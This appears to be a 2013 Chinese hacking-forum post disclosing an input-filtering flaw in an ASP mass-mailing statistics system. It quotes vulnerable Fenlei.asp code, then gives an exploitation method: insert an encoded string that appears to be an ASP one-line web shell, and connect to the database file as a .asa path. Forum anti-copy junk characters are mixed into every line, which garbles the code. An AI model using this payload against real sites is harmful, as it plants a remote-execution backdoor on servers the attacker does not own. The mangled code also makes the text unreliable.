找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2548|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
! W; P- E: C3 }1 i- a& `4 f8 M6 q& l& l/ n6 A- V. D2 W+ ]; [' l
IF Request.QueryString("Action")="del" Then
" h+ @+ J( {$ YID=Request.QueryString("ID")
$ D" U- u& l1 K3 Z7 I' gIF Countss ("tui","Fenlei",ID )<>0 then
) L7 }8 P; z9 V& x& L2 ['略
$ V( V3 p' }5 Y+ S" B3 w- k. T# \IF Request.QueryString("Action")="Add" Then
$ M/ f" Z* @+ Q2 A1 }4 tTname=Request.Form("Typename") % F6 f2 l1 i! F0 a
Set Rs=Server.CreateObject("adodb.Recordset")
( O1 {% H3 z& e- A8 Q2 JSql="Select * From Fenlei Order by id Desc " 3 }) q  p2 F4 S9 v% S' u
Rs.Open Sql,Conn,1,3 $ z2 F1 Q( r2 c; y  \: ^% @% h! u2 ~; ]
Rs.Addnew
% ^$ ]0 K0 l; [5 J$ lRs("Typename")=Tname
- N0 N" A/ Q: W5 e5 u'略 / u- Z/ z- D( @
Set Rs=Server.CreateObject("adodb.Recordset")
8 {7 i2 l% }+ rSql="Select * From Fenlei Order by id Desc "
1 E2 ]& L+ y& p3 [( V. BRs.Open Sql,Conn,1,1
& a$ E4 V+ A8 L) F* K'略
3 z3 F$ q7 `5 Z( G6 \. w9 y%>  j8 y8 V! F, c9 [
" g5 ]( B  F% `/ T) b7 C
! m8 Q# _' H- t

. e& c9 _0 r3 Y8 l没有过滤,直接写入数据库。
; J. n: j6 B) C3 B( A
! b- @  C6 Y, k& J利用方法:  r3 s& h& U% H! @9 q

* F8 @0 t7 q2 i0 l: i插入:┼攠數畣整爠煥敵瑳∨≡┩>
( |1 l% k6 J8 S% l ! C$ L. I! c( B

3 D: ]: j# A4 L1 _7 r连接: http://www.xxx.com/###tongbaner.asa ! D  q1 R' J8 d: {
'默认安装文件: & q  h5 q: e) Y8 D5 C
'install.asp
4 ^' [$ O2 q. ^' G) V  g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表